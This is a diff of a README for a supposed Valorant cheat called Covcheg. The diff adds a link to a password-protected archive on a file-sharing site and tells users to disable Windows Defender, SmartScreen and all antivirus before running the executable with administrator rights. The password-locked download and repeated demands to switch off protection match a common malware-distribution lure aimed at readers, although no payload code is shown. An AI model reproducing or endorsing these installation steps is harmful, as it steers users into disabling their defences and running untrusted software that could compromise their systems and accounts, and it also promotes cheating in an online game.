Paikidzee/COVCHEG-VALORANT-2025/README.md

 ## 💾 Installation

-1. [Download] the latest version of Covcheg.
+1. [Download](https://www.4sync.com/rar/Juzt2NK_/Covcheg.html) the latest version of Covcheg.
+(Password **COVCHEG**)
 2. Disable Windows Defender, Smart Screen, and any other antivirus programs as listed in the System Requirements.
 3. Extract the files to a preferred directory on your computer.
 4. Run the executable file with administrator privileges.
+5. If the cheat does not start, restart your PC, disable all antiviruses and try again.
-5. Configure settings via the user interface before launching Valorant.
+6. Configure settings via the user interface before launching Valorant.
-6. Launch Valorant and enjoy the enhanced features.
+7. Launch Valorant and enjoy the enhanced features.

 *Note:* Always ensure your system is properly prepared before installation to avoid detection.